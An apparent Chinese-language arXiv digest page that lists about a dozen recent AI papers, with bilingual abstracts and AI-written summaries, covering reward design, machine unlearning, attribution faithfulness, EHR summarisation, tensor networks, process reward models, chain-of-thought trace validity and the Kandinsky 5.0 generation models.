有效的奖励设计是代码生成强化学习(RL)中的核心挑战。主流的测试套件级结果奖励强制执行功能正确性但导致稀疏性,而外部奖励模型(RM)提供密集监督但代价是错位和额外开销。由于代码评估自然产生多个测试用例级结果,部分成功(即通过部分测试用例)提供了内在的、可验证的密集监督来源。在本文中,我们提出VeRPO(可验证密集奖励策略优化),一个系统地将可验证的部分成功转化为可靠密集奖励的RL框架。我们使用加权和公式分析部分成功奖励,理论上识别出一个关键的基数偏差,导致策略更新不成比例地偏向于从简单测试成功中获益,而非在前沿测试上取得进展。基于此,VeRPO引入了一个动态的、密度校准的局部奖励,明确纠正这种偏差,并从部分成功中提供稳健的密集监督。为了增强与端到端功能正确性的一致性,VeRPO进一步将局部密集奖励与全局执行结果相结合。在多种基准和设置上的大量实验表明,VeRPO优于结果驱动和基于RM的基线,实现了高达+8.83 pass@1的提升,且时间成本可忽略不计(<0.02%),GPU内存开销为零。

英文摘要

Effective reward design is a central challenge in Reinforcement Learning (RL) for code generation. Mainstream test-suite-level outcome rewards enforce functional correctness but induce sparsity, while external Reward Models (RMs) provide dense supervision at the cost of misalignment and additional overhead. Since code evaluation naturally yields multiple test-case-level outcomes, partial success, i.e., passing a subset of test cases, offers an intrinsic, verifiable source of dense supervision. In this paper, we propose VeRPO (Verifiable Dense Reward Policy Optimization), an RL framework that systematically turns verifiable partial success into reliable dense rewards. We analyze partial-success rewards using a weighted sum formulation, theoretically identifying a critical cardinality bias that causes policy updates to disproportionately favor gains from easy-test successes over progress on frontier tests. Based on this, VeRPO introduces a dynamic, density-calibrated local reward that explicitly corrects this bias and provides robust dense supervision from partial success. To enhance alignment with end-to-end functional correctness, VeRPO further integrates the local dense reward with global execution outcomes. Extensive experiments across diverse benchmarks and settings demonstrate that VeRPO outperforms outcome-driven and RM-based baselines, achieving up to +8.83 pass@1 gain with negligible time cost (< 0.02%) and zero GPU memory overhead.

2601.04275 2026-05-27 cs.CR cs.AI cs.CL 版本更新

Shadow Unlearning: A Neuro-Semantic Approach to Fidelity-Preserving Faceless Forgetting in LLMs

影子遗忘:一种面向LLM保真保留的无面孔遗忘的神经语义方法

Dinesh Srivasthav P, Ashok Urlana, Rahul Mishra, Bala Mallikarjunarao Garlapati, Ponnurangam Kumaraguru

发表机构 * TCS Research, Hyderabad(TCS研究院,海得拉巴) IIIT Hyderabad(IIIT海得拉巴)

AI总结 提出影子遗忘范式,通过神经语义投影器遗忘(NSPU)框架在匿名化遗忘数据上实现机器遗忘,保护隐私的同时保持模型效用,计算效率提升至少10倍。

详情
AI中文摘要

机器遗忘旨在选择性地移除特定训练样本的影响,以满足GDPR等隐私法规的“被遗忘权”。然而,许多现有方法需要访问被移除的数据,使其暴露于成员推断攻击和个人身份信息(PII)的潜在滥用。我们通过提出影子遗忘(Shadow Unlearning)来解决这一关键挑战,这是一种新的近似遗忘范式,在不暴露PII的情况下对匿名化遗忘数据进行机器遗忘。我们进一步提出了一种新颖的隐私保护框架——神经语义投影器遗忘(NSPU),以实现影子遗忘。为了评估我们的方法,我们跨五个不同领域构建了多领域虚构遗忘(MuFU)遗忘集,并引入了一个评估栈来量化知识保留与遗忘效果之间的权衡。在各种大型语言模型上的实验表明,NSPU实现了优越的遗忘性能,保持了模型效用,并增强了用户隐私。此外,所提出的方法在计算效率上比标准遗忘方法至少高出10倍。我们的研究为隐私感知的机器遗忘开辟了新方向,平衡了数据保护与模型保真度。

英文摘要

Machine unlearning aims to selectively remove the influence of specific training samples to satisfy privacy regulations such as the GDPR's 'Right to be Forgotten'. However, many existing methods require access to the data being removed, exposing it to membership inference attacks and potential misuse of Personally Identifiable Information (PII). We address this critical challenge by proposing Shadow Unlearning, a novel paradigm of approximate unlearning, that performs machine unlearning on anonymized forget data without exposing PII. We further propose a novel privacy-preserving framework, Neuro-Semantic Projector Unlearning (NSPU) to achieve Shadow unlearning. To evaluate our method, we compile Multi-domain Fictitious Unlearning (MuFU) forget set across five diverse domains and introduce an evaluation stack to quantify the trade-off between knowledge retention and unlearning effectiveness. Experimental results on various LLMs show that NSPU achieves superior unlearning performance, preserves model utility, and enhances user privacy. Additionally, the proposed approach is at least 10x more computationally efficient than standard unlearning approaches. Our findings foster a new direction for privacy-aware machine unlearning that balances data protection and model fidelity.

2601.03089 2026-05-27 cs.CL cs.AI cs.LG 版本更新

Faithfulness Evaluation for Decoder-only LLM Attributions with Controlled Retained Information

基于受控保留信息的仅解码器LLM归因忠实性评估

Xin Huang, Antoni B. Chan

发表机构 * City University of Hong Kong(香港城市大学)

AI总结 针对现有软扰动忠实性指标因保留词数不同导致评估偏差的问题,提出π-Soft-NC和π-Soft-NS框架,通过控制期望保留概率公平比较归因方法,并引入专用于自回归解码器LLM的梯度归因方法Grad-ELLM。

详情
AI中文摘要

大型语言模型(LLM)越来越多地使用输入归因方法进行评估,但比较这些解释仍然具有挑战性。现有的软扰动忠实性指标,如Soft-NC和Soft-NS,可能将归因质量与扰动期间保留的词数混为一谈:平均得分较高的归因方法可能保留更多词,从而获得膨胀的分数。为解决此问题,我们提出π-Soft-NC和π-Soft-NS,这是一个在相同期望保留概率下比较归因方法的评估框架,从而控制保留词数。我们进一步引入Grad-ELLM,一种针对自回归仅解码器LLM定制的基于梯度的归因方法,该方法在每个解码步骤将梯度导出的通道重要性与注意力导出的标记重要性相结合。在Llama和Mistral上的分类和开放生成任务实验表明,Grad-ELLM在π-Soft-NC下实现了强全面性导向的忠实性,而在π-Soft-NS下没有主导方法。我们的评估指标为比较LLM的可解释人工智能方法提供了一个严格的框架,将支持该领域的进展。

英文摘要

Large Language Models (LLMs) are increasingly evaluated with input attribution methods, yet comparing such explanations remains challenging. Existing soft-perturbation faithfulness metrics, such as Soft-NC and Soft-NS, can conflate attribution quality with the number of words retained during perturbation: attribution methods with larger average scores may keep more words and therefore obtain inflated scores. To address this issue, we propose $π$-Soft-NC and $π$-Soft-NS, an evaluation framework that compares attribution methods under the same expected retaining probability, thus controlling the number of retained words. We further introduce Grad-ELLM, a gradient-based attribution method tailored to autoregressive decoder-only LLMs, which combines gradient-derived channel importance with attention-derived token importance at each decoding step. Experiments on classification and open-generation tasks with Llama and Mistral show that Grad-ELLM achieves strong comprehensiveness-oriented faithfulness under $π$-Soft-NC, while there is no dominant method under $π$-Soft-NS. Our evaluation metric serves as a rigorous framework to compare XAI methods for LLMs, which will support progress in the field.

2601.01668 2026-05-27 cs.CL cs.AI 版本更新

EHRSummarizer: A Privacy-Aware, FHIR-Native Reference Architecture for Source-Grounded EHR Summarization

EHRSummarizer:一种隐私感知、FHIR原生的源接地EHR摘要参考架构

Houman Kazemzadeh, Nima Minaifar, Kamyar Naderi, Sho Tabibzadeh

发表机构 * MedLedger365 MedConnect365 Xylemed Kypath Associates Inc.

AI总结 提出一种隐私感知、FHIR原生的参考架构EHRSummarizer,通过检索HL7 FHIR R4资源并约束生成源接地摘要,以支持临床病历审查。

Comments 15 pages, 2 figures, 2 tables. Version 2 clarifies missing-data status handling, medication-status ambiguity, controlled narrative-document handling, source-grounded resource grouping, and future source-to-summary traceability

详情
AI中文摘要

临床医生通常需要浏览碎片化的电子健康记录(EHR)界面,以整合患者问题、用药、近期就诊和纵向趋势的连贯图像。本文描述了EHRSummarizer,一种用于结构化EHR摘要的隐私感知、FHIR原生参考架构。该架构检索一组目标性的高收益HL7 FHIR R4资源,将其标准化为临床上下文包,并使用受约束的摘要阶段生成源接地摘要,旨在支持病历审查。该架构进一步阐明了缺失数据状态处理、用药状态模糊性、在可用时对叙述性临床文档的受控使用,以及未来的源到摘要可追溯性。本文描述的是参考架构和原型行为,而非经过验证的临床干预、自主临床决策支持系统或临床获益证据。在合成和测试FHIR环境上的原型演示展示了端到端行为和输出格式;然而,本文未报告临床结果、受控工作流研究或基准结果。我们概述了一个评估计划,重点关注忠实性、遗漏风险、时间正确性、可用性、隐私和操作监控,以指导未来的机构评估。

英文摘要

Clinicians routinely navigate fragmented electronic health record (EHR) interfaces to assemble a coherent picture of a patient's problems, medications, recent encounters, and longitudinal trends. This manuscript describes EHRSummarizer, a privacy-aware, FHIR-native reference architecture for structured EHR summarization. The architecture retrieves a targeted set of high-yield HL7 FHIR R4 resources, normalizes them into a clinical context package, and uses a constrained summarization stage to produce source-grounded summaries intended to support chart review. The architecture further clarifies missing-data status handling, medication-status ambiguity, controlled use of narrative clinical documents when available, and future source-to-summary traceability. The manuscript describes a reference architecture and prototype behavior rather than a validated clinical intervention, autonomous clinical decision-support system, or evidence of clinical benefit. Prototype demonstrations on synthetic and test FHIR environments illustrate end-to-end behavior and output formats; however, this manuscript does not report clinical outcomes, controlled workflow studies, or benchmark results. We outline an evaluation plan centered on faithfulness, omission risk, temporal correctness, usability, privacy, and operational monitoring to guide future institutional assessment.

2512.17090 2026-05-27 cs.LG cs.AI 版本更新

How to Square Tensor Networks and Circuits Without Squaring Them

如何平方张量网络和电路而不进行平方操作

Lorenzo Loconte, Adrián Javaloy, Antonio Vergari

发表机构 * School of Informatics, University of Edinburgh, UK(爱丁堡大学信息学院)

AI总结 提出一种参数化方法,通过正交性和确定性条件简化平方张量网络和电路的边际化计算,避免额外复杂度,并在分布估计任务中保持表达能力且提升学习效率。

详情
AI中文摘要

平方张量网络(TNs)及其作为计算图的扩展——平方电路——已被用作表达性的分布估计器,同时支持闭式边际化。然而,平方操作在计算配分函数或边际化变量时引入了额外的复杂性,这阻碍了它们在机器学习中的应用。为了解决这个问题,张量网络的正则形式通过酉矩阵参数化以简化边际计算。然而,这些正则形式不适用于电路,因为电路可以表示不直接映射到已知张量网络的分解。受正则形式中的正交性和电路中实现可处理最大化的确定性的启发,我们展示了如何参数化平方电路以克服其边际化开销。我们的参数化即使在不同于张量网络的分解中也能实现高效的边际化,这些分解编码为电路,否则其结构会使边际化计算变得困难。最后,我们在分布估计上的实验表明,我们提出的平方电路条件在没有任何表达能力损失的情况下,实现了更高效的学习。

英文摘要

Squared tensor networks (TNs) and their extension as computational graphs--squared circuits--have been used as expressive distribution estimators, yet supporting closed-form marginalization. However, the squaring operation introduces additional complexity when computing the partition function or marginalizing variables, which hinders their applicability in ML. To solve this issue, canonical forms of TNs are parameterized via unitary matrices to simplify the computation of marginals. However, these canonical forms do not apply to circuits, as they can represent factorizations that do not directly map to a known TN. Inspired by the ideas of orthogonality in canonical forms and determinism in circuits enabling tractable maximization, we show how to parameterize squared circuits to overcome their marginalization overhead. Our parameterizations unlock efficient marginalization even in factorizations different from TNs, but encoded as circuits, whose structure would otherwise make marginalization computationally hard. Finally, our experiments on distribution estimation show how our proposed conditions in squared circuits come with no expressiveness loss, while enabling more efficient learning.

2512.12413 2026-05-27 cs.AI cs.HC 版本更新

Understanding Critical Thinking in Generative Artificial Intelligence Use: Development, Validation, and Correlates of the Critical Thinking in AI Use Scale

生成式人工智能使用中的批判性思维:批判性思维在AI使用中的量表开发、验证与关联因素

Gabriel R. Lau, Wei Yan Low, Louis Tay, Ysabel Guevarra, Dragan Gašević, Andree Hartanto

发表机构 * School of Social Sciences, Nanyang Technological University(南洋理工大学社会科学学院) Interdisciplinary Graduate Programme, Nanyang Technological University(南洋理工大学跨学科研究生项目) College of Health and Human Sciences, Purdue University(普渡大学健康与人类科学学院) School of Social Sciences, Singapore Management University(新加坡管理学院社会科学学院) Faculty of Information Technology, Monash University(墨尔本大学信息技术学院)

AI总结 本研究开发并验证了13项批判性思维在AI使用中的量表,发现其包含验证、动机和反思三个因子,并与开放性、外向性、积极情感和AI使用频率正相关,且能预测更频繁的验证策略和更高的真实性判断准确性。

详情
Journal ref
Computers in Human Behavior Reports, 22, 101103 (2026)
AI中文摘要

生成式AI工具日益嵌入日常工作和学习中,但其流畅性、不透明性和产生幻觉的倾向意味着用户必须批判性地评估AI输出,而不是全盘接受。本研究将AI使用中的批判性思维概念化为一种倾向性特质,包括验证AI生成信息的来源和内容、理解模型的工作原理及其失败之处,以及反思依赖AI的更广泛影响。通过六项研究(N=1365),我们开发并验证了13项批判性思维在AI使用中的量表,并绘制了其法则网络。研究1生成并内容验证了量表项目。研究2支持了三因子结构(验证、动机和反思)。研究3、4和5确认了这一高阶模型,展示了内部一致性、重测信度、强因子载荷、性别不变性以及收敛和判别效度。研究3和4进一步揭示,AI使用中的批判性思维与开放性、外向性、积极特质情感和AI使用频率正相关。最后,研究6展示了量表的效标效度,更高的批判性思维在AI使用中的得分预测了更频繁和多样化的验证策略、在新型自然主义ChatGPT驱动的事实核查任务中更高的真实性判断准确性,以及对负责任AI的更深入反思。总之,当前工作阐明了人们为何以及如何对生成式AI输出进行监督,并提供了一个经过验证的量表和生态学基础的任务范式,以支持关于批判性参与生成式AI输出的理论检验、跨群体和纵向研究。

英文摘要

Generative AI tools are increasingly embedded in everyday work and learning, yet their fluency, opacity, and propensity to hallucinate mean that users must critically evaluate AI outputs rather than accept them at face value. The present research conceptualises critical thinking in AI use as a dispositional tendency to verify the source and content of AI-generated information, to understand how models work and where they fail, and to reflect on the broader implications of relying on AI. Across six studies (N = 1365), we developed and validated the 13-item critical thinking in AI use scale and mapped its nomological network. Study 1 generated and content-validated scale items. Study 2 supported a three-factor structure (Verification, Motivation, and Reflection). Studies 3, 4, and 5 confirmed this higher-order model, demonstrated internal consistency and test-retest reliability, strong factor loadings, sex invariance, and convergent and discriminant validity. Studies 3 and 4 further revealed that critical thinking in AI use was positively associated with openness, extraversion, positive trait affect, and frequency of AI use. Lastly, Study 6 demonstrated criterion validity of the scale, with higher critical thinking in AI use scores predicting more frequent and diverse verification strategies, greater veracity-judgement accuracy in a novel and naturalistic ChatGPT-powered fact-checking task, and deeper reflection about responsible AI. Taken together, the current work clarifies why and how people exercise oversight over generative AI outputs and provides a validated scale and ecologically grounded task paradigm to support theory testing, cross-group, and longitudinal research on critical engagement with generative AI outputs.

2511.20586 2026-05-27 cs.AI cs.LG 版本更新

PaTAS: A Framework for Trust Propagation in Neural Networks Using Subjective Logic

PaTAS:基于主观逻辑的神经网络信任传播框架

Koffi Ismael Ouattara, Ioannis Krontiris, Theo Dimitrakos, Dennis Eisermann, Houda Labiod, Frank Kargl

AI总结 提出PaTAS框架,利用主观逻辑在神经网络中并行传播信任,通过信任节点和信任函数量化输入、参数和激活的信任,并设计参数信任更新和推理路径信任评估方法,以在对抗或退化条件下提供可解释的信任估计。

详情
AI中文摘要

可信度已成为安全关键应用中人工智能系统部署的关键要求。传统的评估指标(如准确率和精确率)无法充分捕捉不确定性或模型预测的可靠性,尤其是在对抗或退化条件下。本文介绍了并行信任评估系统(PaTAS),这是一个使用主观逻辑(SL)对神经网络中的信任进行建模和传播的框架。PaTAS通过信任节点和信任函数与标准神经计算并行运行,这些节点和函数在网络中传播输入、参数和激活信任。该框架定义了一种参数信任更新机制,以在训练过程中优化参数可靠性,以及一种推理路径信任评估(IPTA)方法,以在推理时计算实例特定的信任。在真实世界和对抗性数据集上的实验表明,PaTAS产生可解释、对称且收敛的信任估计,这些估计补充了准确率,并揭示了在中毒、有偏或不确定数据场景中的可靠性差距。结果表明,PaTAS有效区分良性输入和对抗性输入,并识别模型置信度与实际可靠性不一致的情况。通过在神经架构中实现透明且可量化的信任推理,PaTAS为评估AI生命周期中的模型可靠性提供了基础。

英文摘要

Trustworthiness has become a key requirement for the deployment of artificial intelligence systems in safety-critical applications. Conventional evaluation metrics, such as accuracy and precision, fail to appropriately capture uncertainty or the reliability of model predictions, particularly under adversarial or degraded conditions. This paper introduces the Parallel Trust Assessment System (PaTAS), a framework for modeling and propagating trust in neural networks using Subjective Logic (SL). PaTAS operates in parallel with standard neural computation through Trust Nodes and Trust Functions that propagate input, parameter, and activation trust across the network. The framework defines a Parameter Trust Update mechanism to refine parameter reliability during training and an Inference-Path Trust Assessment (IPTA) method to compute instance-specific trust at inference. Experiments on real-world and adversarial datasets demonstrate that PaTAS produces interpretable, symmetric, and convergent trust estimates that complement accuracy and expose reliability gaps in poisoned, biased, or uncertain data scenarios. The results show that PaTAS effectively distinguishes between benign and adversarial inputs and identifies cases where model confidence diverges from actual reliability. By enabling transparent and quantifiable trust reasoning within neural architectures, PaTAS provides a foundation for evaluating model reliability across the AI lifecycle.

2412.20505 2026-05-27 cs.AI cs.CL cs.LG 版本更新

LiPUP-MA: A Residential Experience-centric Multi-Agent Framework for Living-in-the-loop Participatory Urban Planning

LiPUP-MA:一种以居住体验为中心的循环参与式城市多智能体规划框架

Hang Ni, Yuzhi Wang, Yizhi Song, Hao Liu

发表机构 * The Hong Kong University of Science and Technology (Guangzhou)(香港科学与技术大学(广州)) The Hong Kong Polytechnic University(香港理工大学)

AI总结 提出LiPUP-MA多智能体框架,通过模拟居住生活与体验驱动的计划修订循环,利用基于图的经验库和空间约束技能增强规划器,解决参与式城市规划中经验落地与反馈空间化问题。

详情
AI中文摘要

参与式城市规划(PUP)日益得到基于LLM的智能体的支持,但现有方法主要依赖于静态偏好 elicitation 和一次性利益相关者讨论,忽视了现实世界规划的周期性——居住生活、经验收集和计划调整持续互动。我们提出循环参与式城市规划(LiPUP),一种在模拟居住生活和经验驱动的计划修订之间交替的闭环范式,同时面临两个关键挑战:将分散的居住经验锚定到具体的城市背景中,以及将主观反馈转化为空间连贯的规划行动。为实例化LiPUP,我们引入LiPUP-MA,一个基于LLM的多智能体框架,它构建了一个以计划为中心的基于图的经验库,用于组织来自生活模拟的基于城市的居住反馈,并配备了一个空间约束的技能增强规划器智能体,通过协调经验、视觉和地理空间证据来修订计划。实验表明,LiPUP-MA在传统的静态规划指标和基于生活的指标上均持续优于基线,而迭代的LiPUP循环进一步提高了计划质量。

英文摘要

Participatory Urban Planning (PUP) is increasingly supported by LLM-based agents, yet existing methods largely rely on static preference elicitation and one-shot stakeholder discussions, overlooking the cyclical nature of real-world planning, where residential life, experience collection, and plan adjustment continually interact. We propose Living-in-the-loop Participatory Urban Planning (LiPUP), a closed-loop paradigm that alternates between simulated residential living and experience-driven plan revision, while posing two key challenges: grounding scattered living experience in concrete urban contexts and translating subjective feedback into spatially coherent planning actions. To instantiate LiPUP, we introduce LiPUP-MA, an LLM-based multi-agent framework that constructs a Plan-centric Graph-based Experience Bank to organize urban-grounded residential feedback from living simulation and equips a Spatially-constrained Skill-augmented Planner agent to revise plans by harmonizing experiential, visual, and geospatial evidence. Experiments show that LiPUP-MA consistently outperforms baselines on both conventional static planning metrics and living-based metrics, while iterative LiPUP cycles further improve plan quality.

2512.04868 2026-05-27 cs.CL cs.AI 版本更新

SEAL: Self-Evolving Agentic Learning for Conversational Question Answering over Knowledge Graphs

SEAL: 面向知识图谱对话问答的自我演进智能体学习

Hao Wang, Jialun Zhong, Changcheng Wang, Zhujun Nie, Zheng Li, Shunyu Yao, Yanzeng Li, Xinchi Li

发表机构 * Institute of Big Data and Artificial Intelligence, China Telecom Research Institute(大数据与人工智能研究院,中国电信研究院) Wangxuan Institute of Computer Technology, Peking University(王宣计算机技术研究所,北京大学) School of Artificial Intelligence, China University of Geosciences (Beijing)(人工智能学院,中国地质大学(北京)) Center for Cognition and Neuroergonomics, State Key Laboratory of Cognitive Neuroscience and Learning, Beijing Normal University(认知与神经工效学中心,认知神经科学与学习国家重点实验室,北京师范大学) Institute of Artificial Intelligence and Future Networks, Beijing Normal University(人工智能与未来网络研究院,北京师范大学)

AI总结 提出SEAL两阶段语义解析框架,通过自我演进智能体学习解决知识图谱对话问答中的指代消解、上下文依赖和复杂逻辑推理问题,在SPICE基准上达到最先进性能。

Comments Accept by NeuroComputing

详情
AI中文摘要

基于知识的对话问答(KBCQA)在解决指代消解、上下文依赖建模和执行复杂逻辑推理方面面临持续挑战。现有方法通常存在不准确性和高昂的计算成本,尤其是在处理大规模知识图谱上的复杂查询时。具体而言,大型语言模型(LLM)倾向于为复杂的多跳或聚合查询生成语法无效或语义错位的逻辑形式,而传统的实体-关系链接方法则面临候选空间指数级增长的问题。为了解决这些限制,我们引入了SEAL,一种基于自我演进智能体学习的新型两阶段语义解析框架。在第一阶段,LLM提取一个捕获核心语义的最小S表达式核心,然后通过智能体校准模块进行修正,以纠正语法不一致性并将实体和关系与知识图谱对齐。第二阶段采用基于问题类型预测的模板补全来构建完全可执行的S表达式。关键的是,SEAL包含一种自我演进机制,将局部和全局记忆与反射模块相结合,能够从对话历史和执行反馈中持续适应,而无需显式重新训练。在SPICE基准上的大量实验表明,SEAL在多跳推理、比较和聚合任务中实现了最先进的性能,验证了在结构准确性和计算效率方面的显著提升。

英文摘要

Knowledge-based conversational question answering (KBCQA) confronts persistent challenges in resolving coreference, modeling contextual dependencies, and executing complex logical reasoning. Existing approaches often suffer from inaccuracies and prohibitive computational costs, particularly when processing intricate queries over large knowledge graphs. Specifically, large language models (LLMs) tend to generate syntactically invalid or semantically misaligned logical forms for complex multi-hop or aggregation queries, while conventional entity-relation linking methods face an exponentially growing candidate space. To address these limitations, we introduce SEAL, a novel two-stage semantic parsing framework grounded in self-evolving agentic learning. In the first stage, an LLM extracts a minimal S-expression core capturing the essential semantics, which is then refined by an agentic calibration module to correct syntactic inconsistencies and align entities and relations with the knowledge graph. The second stage employs template-based completion guided by question-type prediction to construct a fully executable S-expression. Crucially, SEAL incorporates a self-evolving mechanism integrating local and global memory with a reflection module, enabling continuous adaptation from dialog history and execution feedback without explicit retraining. Extensive experiments on the SPICE benchmark demonstrate that SEAL achieves state-of-the-art performance in multi-hop reasoning, comparison, and aggregation tasks, validating notable gains in both structural accuracy and computational efficiency.

2506.09532 2026-05-27 cs.LG cs.AI cs.CL cs.CV 版本更新

Athena: Enhancing Multimodal Reasoning with Data-efficient Process Reward Models

Athena: 利用数据高效的过程奖励模型增强多模态推理

Shuai Wang, Zhenhua Liu, Jiaheng Wei, Xuanwu Yin, Dong Li, Emad Barsoum

发表机构 * Advanced Micro Devices Inc.(先进微器件公司) The Hong Kong University of Science and Technology (Guangzhou)(香港科学与技术大学(广州))

AI总结 提出 Athena-PRM,一种多模态过程奖励模型,通过利用弱和强完成者之间的预测一致性高效生成高质量过程标签,在仅5000样本下显著提升复杂推理问题的逐步评估性能。

Comments TMLR 2026, https://openreview.net/forum?id=unWmplHccF

详情
AI中文摘要

我们提出了 Athena-PRM,一种多模态过程奖励模型(PRM),旨在评估解决复杂推理问题中每一步的奖励分数。开发高性能的PRM通常需要大量的时间和资金投入,主要因为需要推理步骤的逐步标注。传统的自动标注方法,如蒙特卡洛估计,通常会产生噪声标签并带来巨大的计算成本。为了高效生成高质量的过程标注数据,我们提出利用弱和强完成者之间的预测一致性作为识别可靠过程标签的标准。值得注意的是,Athena-PRM 在仅5000个样本的情况下,在各种场景和基准测试中展现出卓越的效果。此外,我们还开发了两种有效策略来提升PRM的性能:ORM初始化和负数据上采样。我们在三个具体场景中验证了我们的方法:测试时扩展的验证、推理步骤正确性的直接评估以及奖励排序微调。我们的 Athena-PRM 在多个基准测试和场景中持续取得优越性能。值得注意的是,当使用 Qwen2.5-VL-7B 作为策略模型时,Athena-PRM 在 WeMath 上提升了10.2个百分点,在 MathVista 上提升了7.1个百分点(测试时扩展)。此外,Athena-PRM 在 VisualProcessBench 上取得了最先进(SoTA)结果,比之前的 SoTA 高出3.9个F1分数,展示了其准确评估推理步骤正确性的强大能力。另外,利用 Athena-PRM 作为奖励模型,我们通过奖励排序微调开发了 Athena-7B,在五个基准测试上以显著优势超越了基线。

英文摘要

We present Athena-PRM, a multimodal process reward model (PRM) designed to evaluate the reward score for each step in solving complex reasoning problems. Developing high-performance PRMs typically demands significant time and financial investment, primarily due to the necessity for step-level annotations of reasoning steps. Conventional automated labeling methods, such as Monte Carlo estimation, often produce noisy labels and incur substantial computational costs. To efficiently generate high-quality process-labeled data, we propose leveraging prediction consistency between weak and strong completers as a criterion for identifying reliable process labels. Remarkably, Athena-PRM demonstrates outstanding effectiveness across various scenarios and benchmarks with just 5,000 samples. Furthermore, we also develop two effective strategies to improve the performance of PRMs: ORM initialization and up-sampling for negative data. We validate our approach in three specific scenarios: verification for test time scaling, direct evaluation of reasoning step correctness, and reward ranked fine-tuning. Our Athena-PRM consistently achieves superior performance across multiple benchmarks and scenarios. Notably, when using Qwen2.5-VL-7B as the policy model, Athena-PRM enhances performance by 10.2 points on WeMath and 7.1 points on MathVista for test time scaling. Furthermore, Athena-PRM sets the state-of-the-art (SoTA) results in VisualProcessBench and outperforms the previous SoTA by 3.9 F1-score, showcasing its robust capability to accurately assess the correctness of the reasoning step. Additionally, utilizing Athena-PRM as the reward model, we develop Athena-7B with reward ranked fine-tuning and outperforms baseline with a significant margin on five benchmarks.

2505.13775 2026-05-27 cs.LG cs.AI 版本更新

Beyond Semantics: The Unreasonable Effectiveness of Reasonless Intermediate Tokens

超越语义:无理由中间标记的不合理有效性

Karthik Valmeekam, Vardhan Palod, Kaya Stechly, Atharva Gundawar, Subbarao Kambhampati

发表机构 * School of Computing and AI(计算与人工智能学院) Arizona State University(亚利桑那州立大学) Amazon AGI(亚马逊人工通用智能) Yale University(耶鲁大学)

AI总结 通过从零训练Transformer模型于形式可验证推理轨迹,发现模型在正确与损坏轨迹上表现相似,且损坏轨迹在分布外任务上泛化更好,挑战了中间标记反映或诱导可预测推理行为的假设。

Comments Published in Transactions on Machine Learning Research (TMLR)

详情
AI中文摘要

近期大型推理模型的显著成果被解读为思维链(CoT)的胜利,尤其是基于基础LLM采样的CoT训练过程有助于发现新的推理模式。虽然这些轨迹确实有助于模型性能,但其影响机制尚不明确:一些研究赋予其语义,另一些则警告不要将其视为模型内部计算过程的透明忠实代理。为系统探究推导轨迹的终端用户语义作用,我们设置了一项受控研究,从零开始训练Transformer模型于形式可验证的推理轨迹及其导向的解决方案。我们注意到,尽管相比仅解决方案的基线有所提升,但训练于完全正确轨迹的模型在得出正确解决方案时仍可能产生无效推理轨迹。更有趣的是,实验表明,训练于损坏轨迹(其中间推理步骤与所附问题无关)的模型与训练于正确轨迹的模型表现相似,甚至在分布外任务上泛化更好。我们还研究了基于GRPO的RL后训练对轨迹有效性的影响,发现虽然解决方案准确性提高,但轨迹有效性并未随之改善。最后,我们考察了推理轨迹长度是否反映推理时扩展,发现轨迹长度在很大程度上与所解决问题的底层计算复杂度无关。这些结果挑战了中间标记或“思维链”反映或诱导可预测推理行为的假设,并警示不要将此类输出拟人化或过度解读(尽管其表面形式看似合理)为语言模型中类人或类算法行为的证据。

英文摘要

Recent impressive results from large reasoning models have been interpreted as a triumph of Chain of Thought (CoT), and especially of the process of training on CoTs sampled from base LLMs in order to help find new reasoning patterns. While these traces certainly seem to help model performance, it is not clear how they influence it, with some works ascribing semantics to them and others cautioning against relying on them as transparent and faithful proxies of the model's internal computational process. To systematically investigate the role of end-user semantics of derivational traces, we set up a controlled study where we train transformer models from scratch on formally verifiable reasoning traces and the solutions they lead to. We notice that, despite gains over the solution-only baseline, models trained on entirely correct traces can still produce invalid reasoning traces even when arriving at correct solutions. More interestingly, our experiments also show that models trained on corrupted traces, whose intermediate reasoning steps bear no relation to the problem they accompany, perform similarly to those trained on correct ones, and even generalize better on out-of-distribution tasks. We also study the effect of GRPO-based RL post-training on trace validity, noting that while solution accuracy increases, this is not accompanied by improvements in trace validity. Finally, we examine whether reasoning-trace length reflects inference-time scaling and find that trace length is largely agnostic to the underlying computational complexity of the problem being solved. These results challenge the assumption that intermediate tokens or ``Chains of Thought'' reflect or induce predictable reasoning behaviors and caution against anthropomorphizing such outputs or over-interpreting them (despite their mostly seemingly forms) as evidence of human-like or algorithmic behaviors in language models.

2511.14993 2026-05-27 cs.CV cs.AI cs.LG 版本更新

Kandinsky 5.0: A Family of Foundation Models for Image and Video Generation

Kandinsky 5.0:图像与视频生成的基础模型系列

Vladimir Arkhipkin, Vladimir Korviakov, Nikolai Gerasimenko, Denis Parkhomenko, Viacheslav Vasilev, Alexey Letunovskiy, Nikolai Vaulin, Maria Kovaleva, Ivan Kirillov, Lev Novitskiy, Denis Koposov, Nikita Kiselev, Alexander Varlamov, Dmitrii Mikhailov, Vladimir Polovnikov, Andrey Shutkin, Julia Agafonova, Ilya Vasiliev, Anastasiia Kargapoltseva, Anna Dmitrienko, Anastasia Maltseva, Anna Averchenkova, Olga Kim, Tatiana Nikulina, Denis Dimitrov

发表机构 * Kandinsky Lab(Kandinsky 实验室)

AI总结 本文介绍Kandinsky 5.0系列模型,通过多阶段训练、自监督微调和强化学习后训练,实现高分辨率图像和10秒视频的高质量生成。

Comments Website: https://kandinskylab.ai/

详情
AI中文摘要

本报告介绍了Kandinsky 5.0,一系列用于高分辨率图像和10秒视频合成的最先进基础模型。该框架包含三个核心模型系列:Kandinsky 5.0 Image Lite——6B参数的图像生成模型系列,Kandinsky 5.0 Video Lite——快速轻量级的2B参数文本到视频和图像到视频模型,以及Kandinsky 5.0 Video Pro——19B参数模型,实现了卓越的视频生成质量。我们全面回顾了数据策展生命周期——包括收集、处理、过滤和聚类——用于多阶段训练流程,该流程涉及广泛的预训练,并融入了质量增强技术,如自监督微调(SFT)和基于强化学习(RL)的后训练。我们还介绍了新颖的架构、训练和推理优化,使Kandinsky 5.0能够在各种任务上实现高生成速度和最先进的性能,如人类评估所示。作为一个大规模、公开可用的生成框架,Kandinsky 5.0充分利用其预训练及后续阶段的全部潜力,以适应广泛的生成应用。我们希望本报告,连同我们开源代码和训练检查点的发布,将大大促进高质量生成模型的研究社区发展和可访问性。

英文摘要

